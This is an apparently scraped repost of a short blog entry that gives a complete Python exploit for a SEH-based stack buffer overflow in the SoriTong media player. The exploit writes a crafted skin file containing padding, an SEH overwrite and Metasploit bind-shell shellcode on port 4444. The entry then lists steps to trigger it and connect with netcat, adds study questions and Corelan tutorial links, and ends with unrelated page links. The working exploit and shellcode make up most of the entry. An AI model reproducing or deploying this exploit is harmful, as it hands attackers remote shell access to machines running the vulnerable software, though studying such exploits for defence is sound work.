exploit - stack overflow with seh
来源:互联网 发布:golang http 下载文件 编辑:程序博客网 时间:2024/05/20 18:44
Demo Prog:
Exploit Code
#!/usr/bin/env python# -*- coding: utf8 -*-# Author: Nixawkfpath = "C:\Program Files\SoriTong\Skin\Default\UI.txt"with open(fpath, "w") as f: junk = "A" * 584 nseh = "\xEB\x06\x90\x90" # next pointer pseh = "\x8C\xDD\x01\x10" # seh callback: !mona seh - 0x1001dd8c # bad chars: 00 09 0A 0D # windows/shell_bind_tcp - 355 bytes # http://www.metasploit.com # Encoder: x86/shikata_ga_nai # VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false, # EXITFUNC=seh, InitialAutoRunScript=, AutoRunScript= buf= "\x90" * 32 buf+= "\xd9\xcf\xbd\xa5\x08\x25\xa6\xd9\x74\x24\xf4\x5e\x29" buf+= "\xc9\xb1\x53\x83\xc6\x04\x31\x6e\x13\x03\xcb\x1b\xc7" buf+= "\x53\xef\xf4\x85\x9c\x0f\x05\xea\x15\xea\x34\x2a\x41" buf+= "\x7f\x66\x9a\x01\x2d\x8b\x51\x47\xc5\x18\x17\x40\xea" buf+= "\xa9\x92\xb6\xc5\x2a\x8e\x8b\x44\xa9\xcd\xdf\xa6\x90" buf+= "\x1d\x12\xa7\xd5\x40\xdf\xf5\x8e\x0f\x72\xe9\xbb\x5a" buf+= "\x4f\x82\xf0\x4b\xd7\x77\x40\x6d\xf6\x26\xda\x34\xd8" buf+= "\xc9\x0f\x4d\x51\xd1\x4c\x68\x2b\x6a\xa6\x06\xaa\xba" buf+= "\xf6\xe7\x01\x83\x36\x1a\x5b\xc4\xf1\xc5\x2e\x3c\x02" buf+= "\x7b\x29\xfb\x78\xa7\xbc\x1f\xda\x2c\x66\xfb\xda\xe1" buf+= "\xf1\x88\xd1\x4e\x75\xd6\xf5\x51\x5a\x6d\x01\xd9\x5d" buf+= "\xa1\x83\x99\x79\x65\xcf\x7a\xe3\x3c\xb5\x2d\x1c\x5e" buf+= "\x16\x91\xb8\x15\xbb\xc6\xb0\x74\xd4\x2b\xf9\x86\x24" buf+= "\x24\x8a\xf5\x16\xeb\x20\x91\x1a\x64\xef\x66\x5c\x5f" buf+= "\x57\xf8\xa3\x60\xa8\xd1\x67\x34\xf8\x49\x41\x35\x93" buf+= "\x89\x6e\xe0\x0e\x81\xc9\x5b\x2d\x6c\xa9\x0b\xf1\xde" buf+= "\x42\x46\xfe\x01\x72\x69\xd4\x2a\x1b\x94\xd7\x45\x80" buf+= "\x11\x31\x0f\x28\x74\xe9\xa7\x8a\xa3\x22\x50\xf4\x81" buf+= "\x1a\xf6\xbd\xc3\x9d\xf9\x3d\xc6\x89\x6d\xb6\x05\x0e" buf+= "\x8c\xc9\x03\x26\xd9\x5e\xd9\xa7\xa8\xff\xde\xed\x5a" buf+= "\x63\x4c\x6a\x9a\xea\x6d\x25\xcd\xbb\x40\x3c\x9b\x51" buf+= "\xfa\x96\xb9\xab\x9a\xd1\x79\x70\x5f\xdf\x80\xf5\xdb" buf+= "\xfb\x92\xc3\xe4\x47\xc6\x9b\xb2\x11\xb0\x5d\x6d\xd0" buf+= "\x6a\x34\xc2\xba\xfa\xc1\x28\x7d\x7c\xce\x64\x0b\x60" buf+= "\x7f\xd1\x4a\x9f\xb0\xb5\x5a\xd8\xac\x25\xa4\x33\x75" buf+= "\x5b\x54\x89\x60\xcc\xcf\x78\xc9\x90\xef\x57\x0e\xad" buf+= "\x73\x5d\xef\x4a\x6b\x14\xea\x17\x2b\xc5\x86\x08\xde" buf+= "\xe9\x35\x28\xcb" nops = "\x90" * (5000 - 588 - len(buf) - len(nseh) - len(pseh)) payload = junk + nseh + pseh + buf + nops f.write(payload)
How to exploit SoriTong ?
1. python2 exploit_soritong.py2. cmd.exe /c SoriTong.exe (double click to execute it)3. nc -v 127.0.0.1 4444
Questions:
- How to find address to overwrite pointer of seh ?
- How to avoid bad chars ?
- Could you exploit prog stack with seh ?
- How to use Immunity Debugger mona plugin ?
References:
1. https://www.corelan.be/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/
2. https://www.corelan.be/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/
0 0
- exploit - stack overflow with seh
- FlashGet 1.9.0.1012 (FTP PWD Response) SEH STACK Overflow Exploit
- Exploit Development – Stack Overflow
- Microsoft IIS ASP Stack Overflow Exploit (MS06-034)
- Microsoft Windows Wkssvc NetrJoinDomain2 Stack Overflow(MS06-070) Exploit
- IE NCTAudioFile2.AudioFile ActiveX Remote Stack Overflow Exploit 2
- exploit - simple stack overflow - BlazeDVD Pro player 6.1
- Debugging a Stack Overflow with Windbg
- OverFlow/Exploit/ShellCode
- Buffer Overflow Exploit
- Sun Java Web Server version 7.0 update 7 remote stack overflow exploit
- stack overflow
- stack overflow
- Stack Overflow
- Stack Overflow
- Stack overflow
- stack overflow
- stack overflow
- word2010 标尺游标的微调
- Android 打造任意层级树形控件 考验你的数据结构和设计
- Android的简单应用——应用dispatchKeyEvent双击退出法度
- ASP.NET错误
- poj 1606 Jugs
- exploit - stack overflow with seh
- 工作周记
- Windows8.1(64位)下用vs2013编译cxxnet
- 利用Redis设计秒杀原理
- 【Unity3d】热更新Assetbundle资源以及需要注意的地方
- ImageView的scaletype属性
- ACM输入输出--多组测试用例--C、C++、Java
- CentOS 7安装fcitx中文输入法
- 【图像处理】数字图像处理软件(二)